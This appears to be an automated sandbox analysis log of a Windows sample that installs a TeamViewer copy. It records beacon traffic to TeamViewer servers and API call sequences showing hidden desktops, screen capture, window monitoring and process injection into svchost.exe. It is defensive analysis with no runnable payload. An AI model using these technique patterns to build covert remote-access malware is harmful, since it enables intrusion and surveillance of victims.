Source: global traffic HTTP traffic detected: GET /din.aspx?s=00000000&client=DynGate&rnd=10241550&p=10000001 HTTP/1.1 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate) Host: master15.teamviewer.com Connection: Keep-Alive Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /dout.aspx?s=39260701&p=10000001&client=DynGate&data=FyQSiQCjHqkys5MkoZ6YmRiamBoamBuTJKIemBMmoKGemDwysbMaMTEZsLKzMLGvmLIZshiyspkxsjGYG7Mwr5kanBybGRgbmRiTJqSiHpg8MrGzGjExGbCyszCxr5iyGbIYsrKZMbIxmBuzMK+ZGpwcmxkYG5kYkyepnqu0txuTKx6YmpcYFxscG5AoqQ== HTTP/1.1Accept: */*Content-Type: application/octet-streamContent-Transfer-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master15.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /din.aspx?s=39260701&client=DynGate&p=10000002 HTTP/1.1 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate) Host: master15.teamviewer.com Connection: Keep-Alive Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /din.aspx?s=00000000&client=DynGate&rnd=7666614&p=10000001 HTTP/1.1 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate) Host: master15.teamviewer.com Connection: Keep-Alive Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /dout.aspx?s=39260710&p=10000001&client=DynGate&data=FyQSAAGjHqmyuig6sTY0saWyvJMkoZ6YmRiamBoamBuTJKIemZyYmBmYnBuakyakoh6YPDKxsxoxMRmwsrMwsa+YshmyGLKymTGyMZgbszCvmRqcHJsZGBuZGJMrHpialxgXGxwbkCipkyE0tzC5PJ6DAQAAAFIAACkpoJiAAgAACIAAAAiHrQD5CYOpp7/Zr7rEi/B/CnsUWehIzsjknPiOAQDnHgKBwxxFKCieiWhL1afx9eeCX4JSt5eDF8v1iZJ9o8IQAaQCrRik6ahUAKNkNBEdbLOE0i1SajuFK2r+FTuYEW7cUOxEu9d8mU9y6bkESGL5okL1ayDi3W7V7M1bCeZL HTTP/1.1Accept: */*Content-Type: application/octet-streamContent-Transfer-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master15.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /din.aspx?s=39260710&client=DynGate&p=10000002 HTTP/1.1 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate) Host: master15.teamviewer.com Connection: Keep-Alive Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /din.aspx?s=00000000&client=DynGate&rnd=7666614&p=10000001 HTTP/1.1 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate) Host: master15.teamviewer.com Connection: Keep-Alive Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /dout.aspx?s=39260719&p=10000001&client=DynGate&data=FyQSAwGjHqmyuim0s7cwujq5MqWyvJMkoZ6YmRiamBoamBuTJKIemZyYmBmYnBuakyakoh6YPDKxsxoxMRmwsrMwsa+YshmyGLKymTGyMZgbszCvmRqcHJsZGBuZGJMrHpialxgXGxwbkCipkyE0tzC5PJ6DAQAAABIAACkpoJiAAgAACIAAAC+ETh/xoaDswnDrzpj2ezWmEgvX0+Ej1wtEYkKVyn+ydtvyFua/3Iri8RKmf9YcE9fPWO9gKA702VTWXdcuP9paHCFsUzDIqXKZ7SOAdSL0LmDI+BCYg1VARH3ovhl/wWKHhKvbobA55zrvFJv9j5s06datZSDN5Epd+G/FNL5V HTTP/1.1Accept: */*Content-Type: application/octet-streamContent-Transfer-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master15.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /din.aspx?s=39260719&client=DynGate&p=10000002 HTTP/1.1 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate) Host: master15.teamviewer.com Connection: Keep-Alive Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /din.aspx?s=00000000&client=DynGate&rnd=7666614&p=10000001 HTTP/1.1 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate) Host: master15.teamviewer.com Connection: Keep-Alive Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /dout.aspx?s=39260736&p=10000001&client=DynGate&data=FyQS+gChtjSytzoeqisoqZMjHqY3s7S3EyOrnpgTI6umMrsyth6aGBgTJDSyMqe3NjS3Mqm6MLo6uZ6YEyQqKignqqoemRMkoZ6YmRiamBoamBuTJKIemZyYmBmYnBuakyWysrgwtjS7Mp6YkyYwtzO6sLOynrUwkyY0sbK3ObKqPLgynpgTJqSiHpg8MrGzGjExGbCyszCxr5iyGbIYsrKZMbIxmBuzMK+ZGpwcmxkYG5kYkyc3p7Mgsbo0uzKlsrK4MLY0uzKemBMpOrc6NLaynpwTKbq4ODe5OjKyIzKwujq5MrmemJMqIagnqqoemBMrHpialxgXGxwbkCip HTTP/1.1Accept: */*Content-Type: application/octet-streamContent-Transfer-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master15.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /din.aspx?s=39260736&client=DynGate&p=10000002 HTTP/1.1 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate) Host: master15.teamviewer.com Connection: Keep-Alive Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /din.aspx?s=00000000&m=fast&client=DynGate&rnd=7666614&p=10000001 HTTP/1.1 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate) Host: 178.255.154.140 Connection: Keep-Alive Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /din.aspx?s=12652280&m=fast&client=DynGate&p=10000002 HTTP/1.1 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate) Host: 178.255.154.140 Connection: Keep-Alive Cache-Control: no-cache
Source: unknown HTTPS traffic detected: 172.67.205.33:443 -> 192.168.2.5:49752 version: TLS 1.2
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6EAF66E0 GetDesktopWindow,GetDC,CreateCompatibleDC,RtlZeroMemory,GetWindowRect,CreateCompatibleBitmap,SelectObject,BitBlt,RtlZeroMemory,GetCursorInfo,RtlZeroMemory,GetIconInfo,RtlZeroMemory,GetObjectA,DrawIconEx,SHCreateMemStream,RtlZeroMemory,VirtualAlloc,RtlZeroMemory,VirtualFree,DeleteObject,DeleteDC,ReleaseDC,
Source: C:\Users\user\Desktop\77Etc0bR2v.exeCode function: 1_2_00405042 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalFix,SendMessageA,GlobalUnWire,SetClipboardData,CloseClipboard,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6EAF9BD0 GetCurrentThreadId,GetThreadDesktop,CreateDesktopA,CreateThread,WaitForSingleObject,CloseHandle,Sleep,CloseDesktop,
Source: 77Etc0bR2v.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: C:\Users\user\Desktop\77Etc0bR2v.exeCode function: 1_2_0040323C EntryPoint,73D1E7F0,SetErrorMode,OleInitialize,SHGetFileInfo,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcat,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcat,lstrcmpi,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6EAF5B40 GetProcessHeap,HeapFree,CharLowerA,GetProcessHeap,HeapAlloc,lstrlenA,RtlComputeCrc32,Sleep,Sleep,GetDlgItem,PostMessageA,PostMessageA,PostMessageA,Sleep,Sleep,PostMessageA,Sleep,GetTickCount,RtlRandom,wsprintfA,wsprintfA,GetFileAttributesA,DeleteFileA,wsprintfA,ExpandEnvironmentStringsA,PathIsRelativeA,wsprintfA,StrRChrA,SHCreateDirectoryExA,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,wsprintfA,wsprintfA,DeleteFileA,GetTickCount,RtlRandom,wsprintfA,FrostCrashedWindow,FrostCrashedWindow,WritePrivateProfileStringA,wsprintfA,wsprintfA,GetProcessHeap,HeapFree,LocalFree,HeapFree,GetProcessHeap,WaitForSingleObject,CloseHandle,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 6_2_6EAF5B40 GetProcessHeap,HeapFree,CharLowerA,GetProcessHeap,HeapAlloc,lstrlenA,RtlComputeCrc32,Sleep,Sleep,GetDlgItem,PostMessageA,PostMessageA,PostMessageA,Sleep,Sleep,PostMessageA,Sleep,GetTickCount,RtlRandom,wsprintfA,wsprintfA,GetFileAttributesA,DeleteFileA,wsprintfA,ExpandEnvironmentStringsA,PathIsRelativeA,wsprintfA,StrRChrA,SHCreateDirectoryExA,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,wsprintfA,wsprintfA,DeleteFileA,GetTickCount,RtlRandom,wsprintfA,WritePrivateProfileStringA,wsprintfA,wsprintfA,GetProcessHeap,HeapFree,LocalFree,HeapFree,GetProcessHeap,WaitForSingleObject,CloseHandle,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,
Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_6EAF5B40 GetProcessHeap,HeapFree,CharLowerA,GetProcessHeap,HeapAlloc,lstrlenA,RtlComputeCrc32,Sleep,Sleep,GetDlgItem,PostMessageA,PostMessageA,PostMessageA,Sleep,Sleep,PostMessageA,Sleep,GetTickCount,RtlRandom,wsprintfA,wsprintfA,GetFileAttributesA,DeleteFileA,wsprintfA,ExpandEnvironmentStringsA,PathIsRelativeA,wsprintfA,StrRChrA,SHCreateDirectoryExA,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,wsprintfA,wsprintfA,DeleteFileA,GetTickCount,RtlRandom,wsprintfA,WritePrivateProfileStringA,wsprintfA,wsprintfA,GetProcessHeap,HeapFree,LocalFree,HeapFree,GetProcessHeap,WaitForSingleObject,CloseHandle,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,
Source: C:\Windows\System32\svchost.exe File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: String function: 0040F6FE appears 64 times
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: String function: 0053BCB5 appears 478 times
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: String function: 0053E5C8 appears 37 times
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: String function: 0040DFA6 appears 37 times
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: String function: 004A1B0C appears 248 times
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: String function: 0053BCE8 appears 68 times
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6EAF3610 GetProcessHeap,CreateEnvironmentBlock,RtlZeroMemory,RtlZeroMemory,CreateProcessAsUserW,CreateProcessAsUserW,Sleep,CloseHandle,CloseHandle,CloseHandle,CloseHandle,DestroyEnvironmentBlock,CloseHandle,
Source: C:\Users\user\Desktop\77Etc0bR2v.exeCode function: 1_2_00401000 NtdllDefWindowProc_A,BeginPaint,GetClientRect,DeleteObject,CreateBrushIndirect,FillRect,DeleteObject,CreateFontIndirectA,SetBkMode,SetTextColor,SelectObject,SelectObject,DrawTextA,SelectObject,DeleteObject,EndPaint,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6EAFB0A0 NtQuerySystemInformation,VirtualAlloc,NtQuerySystemInformation,GetCurrentProcessId,GetCurrentThreadId,HeapAlloc,HeapReAlloc,VirtualFree,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6EAF8400 NtQuerySystemInformation,RtlZeroMemory,NtQueryVirtualMemory,RtlCompareMemory,NtWriteVirtualMemory,NtFlushInstructionCache,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6EAFB270 NtResumeThread,NtClose,HeapFree,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6EAFADE0 NtProtectVirtualMemory,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6EAFB1F0 NtSuspendThread,NtClose,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6EAFAFC0 NtGetContextThread,NtSetContextThread,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 3_2_6EAF8510 DisableThreadLibraryCalls,GetModuleHandleA,GetProcessHeap,GetProcessHeap,HeapAlloc,HeapAlloc,GetSystemDirectoryA,ExitProcess,PathAddBackslashA,PathAddBackslashA,GetProcessHeap,HeapAlloc,GetModuleFileNameA,GetProcessHeap,HeapAlloc,RtlMoveMemory,PathRemoveFileSpecA,PathAddBackslashA,SetCurrentDirectoryA,SHGetSpecialFolderPathA,PathAddBackslashA,wsprintfA,GetFileAttributesA,GetFileAttributesA,ExitProcess,wsprintfA,GetFileAttributesA,wsprintfA,GetFileAttributesA,wsprintfA,GetFileAttributesA,ExitProcess,GetProcessHeap,HeapAlloc,GetModuleFileNameA,PathFindFileNameA,RtlZeroMemory,RtlGetVersion,WTSGetActiveConsoleSessionId,GetProcessHeap,HeapAlloc,GetUserNameW,GetProcessHeap,HeapAlloc,GetComputerNameExW,GetProcessHeap,HeapAlloc,wsprintfA,FrostCrashedWindow,FrostCrashedWindow,lstrlenA,GetCommandLineA,CharLowerA,StrToIntA,LocalFree,RtlZeroMemory,FrostCrashedWindow,FrostCrashedWindow,GetPrivateProfileIntA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,wsprintfA,GetProcessHeap,HeapFree,LoadLibraryA,ExitProcess,RtlZeroMemory,NtQuerySystemInformation,wsprintfA,wsprintfA,LoadLibraryA,FindWindowW,FindWindowW,wsprintfA,LoadLibraryA,wsprintfA,LoadLibraryA,wsprintfA,LoadLibraryA,wsprintfA,wsprintfA,GetProcessHeap,HeapFree,LoadLibraryA,wsprintfA,LoadLibraryA,ExitProcess,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,FrostCrashedWindow,FrostCrashedWindow,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,InvertRect,InvertRect,GetProcessHeap,HeapFree,LocalFree,CloseHandle,CloseHandle,NtTerminateThread,CloseHandle,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6EAF14E0 NtAllocateVirtualMemory,NtAllocateVirtualMemory,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6EAF4EF0 RtlZeroMemory,RtlZeroMemory,CreateProcessA,WaitForSingleObject,GetExitCodeProcess,NtTerminateProcess,CloseHandle,CloseHandle,CloseHandle,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6EAFB2D0 RtlMoveMemory,NtFlushInstructionCache,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6EAF2ED0 CreatePipe,RtlZeroMemory,RtlZeroMemory,CreateProcessA,CloseHandle,CloseHandle,GetProcessHeap,HeapAlloc,GetTickCount,ReadFile,MultiByteToWideChar,GetProcessHeap,HeapAlloc,MultiByteToWideChar,WideCharToMultiByte,GetProcessHeap,HeapAlloc,WideCharToMultiByte,GetProcessHeap,HeapFree,GetTickCount,ReadFile,GetProcessHeap,HeapReAlloc,GetProcessHeap,HeapFree,NtTerminateProcess,GetProcessHeap,HeapFree,CloseHandle,CloseHandle,CloseHandle,CloseHandle,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6EAF18D0 NtProtectVirtualMemory,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6EAFAE20 NtOpenThread,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6EAF1C00 FreeLibrary,FreeLibrary,GetProcessHeap,HeapFree,NtFreeVirtualMemory,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6EAF2640 #404,RtlZeroMemory,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,#404,RtlMoveMemory,NtUnmapViewOfSection,NtUnmapViewOfSection,NtClose,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6EAF23B0 LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetCommandLineA,lstrcmpiA,lstrcmpiA,StrRChrA,wsprintfA,OpenEventA,CreateEventA,RtlZeroMemory,CreateThread,NtTerminateThread,CloseHandle,VirtualFree,CloseHandle,CloseHandle,LocalFree,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,ExitProcess,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6EAF7790 PostThreadMessageA,WaitForSingleObject,NtTerminateThread,CloseHandle,PostQuitMessage,PostMessageA,CreateThread,CallWindowProcW,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6EAF19F0 FreeLibrary,FreeLibrary,GetProcessHeap,HeapFree,NtFreeVirtualMemory,GetProcessHeap,HeapFree,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6EAFAD39 NtProtectVirtualMemory,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6EAFA500 NtQueryVirtualMemory,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6EAF2750 GetFileAttributesA,GetProcessHeap,GetProcessHeap,HeapAlloc,wsprintfA,RtlZeroMemory,RtlZeroMemory,CreateProcessA,NtGetContextThread,NtSetContextThread,NtResumeThread,NtTerminateProcess,CloseHandle,CloseHandle,CloseHandle,GetProcessHeap,HeapFree,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6EAF6D50 RtlZeroMemory,VirtualAlloc,RtlZeroMemory,GetLocaleInfoW,CharLowerW,RtlZeroMemory,RtlGetNtVersionNumbers,RtlZeroMemory,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,SetTimer,GetMessageA,KillTimer,InvertRect,InvertRect,RtlZeroMemory,wsprintfW,GetPrivateProfileStringW,RtlMoveMemory,GetProcessHeap,HeapFree,GetForegroundWindow,GetWindowTextW,RtlMoveMemory,GetProcessHeap,HeapFree,GetWindowThreadProcessId,NtOpenProcess,GetModuleFileNameExW,RtlMoveMemory,GetProcessHeap,HeapFree,NtClose,Sleep,GetDlgItemTextA,StrTrimA,GetDlgItemTextA,VirtualFree,FrostCrashedWindow,FrostCrashedWindow,WritePrivateProfileStringA,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,CreateThread,CloseHandle,Sleep,GetProcessHeap,HeapFree,RtlZeroMemory,GetSystemTimeAsFileTime,RtlTimeToSecondsSince1970,FrostCrashedWindow,FrostCrashedWindow,GetPrivateProfileIntA,wsprintfA,FrostCrashedWindow,FrostCrashedWindow,WritePrivateProfileStringA,SetEvent,SetTimer,DispatchMessageA,GetMessageA,KillTimer,VirtualFree,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 6_2_6EAFAFC0 NtGetContextThread,NtSetContextThread,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 6_2_6EAFADE0 NtProtectVirtualMemory,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 6_2_6EAF6D50 RtlZeroMemory,VirtualAlloc,RtlZeroMemory,GetLocaleInfoW,CharLowerW,RtlZeroMemory,RtlGetNtVersionNumbers,RtlZeroMemory,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,SetTimer,GetMessageA,KillTimer,RtlZeroMemory,wsprintfW,GetPrivateProfileStringW,RtlMoveMemory,GetProcessHeap,HeapFree,GetForegroundWindow,GetWindowTextW,RtlMoveMemory,GetProcessHeap,HeapFree,GetWindowThreadProcessId,NtOpenProcess,GetModuleFileNameExW,RtlMoveMemory,GetProcessHeap,HeapFree,NtClose,Sleep,GetDlgItemTextA,StrTrimA,GetDlgItemTextA,VirtualFree,WritePrivateProfileStringA,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,CreateThread,CloseHandle,Sleep,GetProcessHeap,HeapFree,RtlZeroMemory,GetSystemTimeAsFileTime,RtlTimeToSecondsSince1970,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,SetEvent,SetTimer,DispatchMessageA,GetMessageA,KillTimer,VirtualFree,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 6_2_6EAF7790 PostThreadMessageA,WaitForSingleObject,NtTerminateThread,CloseHandle,PostQuitMessage,PostMessageA,CreateThread,CallWindowProcW,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 6_2_6EAF8400 NtQuerySystemInformation,RtlZeroMemory,NtQueryVirtualMemory,RtlCompareMemory,NtWriteVirtualMemory,NtFlushInstructionCache,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 6_2_6EAF8510 DisableThreadLibraryCalls,GetModuleHandleA,GetProcessHeap,GetProcessHeap,HeapAlloc,HeapAlloc,GetSystemDirectoryA,ExitProcess,PathAddBackslashA,PathAddBackslashA,GetProcessHeap,HeapAlloc,GetModuleFileNameA,GetProcessHeap,HeapAlloc,RtlMoveMemory,PathRemoveFileSpecA,PathAddBackslashA,SetCurrentDirectoryA,SHGetSpecialFolderPathA,PathAddBackslashA,wsprintfA,GetFileAttributesA,GetFileAttributesA,ExitProcess,wsprintfA,GetFileAttributesA,wsprintfA,GetFileAttributesA,wsprintfA,GetFileAttributesA,ExitProcess,GetProcessHeap,HeapAlloc,GetModuleFileNameA,PathFindFileNameA,RtlZeroMemory,RtlGetVersion,WTSGetActiveConsoleSessionId,GetProcessHeap,HeapAlloc,GetUserNameW,GetProcessHeap,HeapAlloc,GetComputerNameExW,GetProcessHeap,HeapAlloc,wsprintfA,lstrlenA,GetCommandLineA,CharLowerA,StrToIntA,LocalFree,RtlZeroMemory,GetPrivateProfileIntA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,wsprintfA,GetProcessHeap,HeapFree,LoadLibraryA,ExitProcess,RtlZeroMemory,NtQuerySystemInformation,wsprintfA,wsprintfA,LoadLibraryA,FindWindowW,FindWindowW,wsprintfA,LoadLibraryA,wsprintfA,LoadLibraryA,wsprintfA,LoadLibraryA,wsprintfA,wsprintfA,GetProcessHeap,HeapFree,LoadLibraryA,wsprintfA,LoadLibraryA,ExitProcess,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,LocalFree,CloseHandle,CloseHandle,NtTerminateThread,CloseHandle,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 6_2_6EAFB270 NtResumeThread,NtClose,HeapFree,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 6_2_6EAFB0A0 NtQuerySystemInformation,VirtualAlloc,NtQuerySystemInformation,GetCurrentProcessId,GetCurrentThreadId,HeapAlloc,HeapReAlloc,VirtualFree,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 6_2_6EAFB1F0 NtSuspendThread,NtClose,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 6_2_6EAF4EF0 RtlZeroMemory,RtlZeroMemory,CreateProcessA,WaitForSingleObject,GetExitCodeProcess,NtTerminateProcess,wsprintfA,CloseHandle,CloseHandle,CloseHandle,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 6_2_6EAF2ED0 CreatePipe,RtlZeroMemory,RtlZeroMemory,CreateProcessA,CloseHandle,CloseHandle,GetProcessHeap,HeapAlloc,GetTickCount,ReadFile,MultiByteToWideChar,GetProcessHeap,HeapAlloc,MultiByteToWideChar,WideCharToMultiByte,GetProcessHeap,HeapAlloc,WideCharToMultiByte,GetProcessHeap,HeapFree,GetTickCount,ReadFile,GetProcessHeap,HeapReAlloc,GetProcessHeap,HeapFree,NtTerminateProcess,GetProcessHeap,HeapFree,CloseHandle,CloseHandle,CloseHandle,CloseHandle,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 6_2_6EAFAE20 NtOpenThread,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 6_2_6EAF1C00 FreeLibrary,FreeLibrary,GetProcessHeap,HeapFree,NtFreeVirtualMemory,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 6_2_6EAFAD39 NtProtectVirtualMemory,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 6_2_6EAF18D0 NtProtectVirtualMemory,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 6_2_6EAF19F0 FreeLibrary,FreeLibrary,GetProcessHeap,HeapFree,NtFreeVirtualMemory,GetProcessHeap,HeapFree,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 6_2_6EAF2640 #404,RtlZeroMemory,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,#404,RtlMoveMemory,NtUnmapViewOfSection,NtUnmapViewOfSection,NtClose,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 6_2_6EAF2750 GetFileAttributesA,GetProcessHeap,GetProcessHeap,HeapAlloc,wsprintfA,RtlZeroMemory,RtlZeroMemory,CreateProcessA,NtGetContextThread,NtSetContextThread,NtResumeThread,NtTerminateProcess,CloseHandle,CloseHandle,CloseHandle,GetProcessHeap,HeapFree,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 6_2_6EAF14E0 NtAllocateVirtualMemory,NtAllocateVirtualMemory,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 6_2_6EAFA500 NtQueryVirtualMemory,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 6_2_6EAFB2D0 RtlMoveMemory,NtFlushInstructionCache,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 6_2_6EAF23B0 LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetCommandLineA,lstrcmpiA,lstrcmpiA,StrRChrA,wsprintfA,OpenEventA,CreateEventA,RtlZeroMemory,CreateThread,NtTerminateThread,CloseHandle,VirtualFree,CloseHandle,CloseHandle,LocalFree,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,ExitProcess,
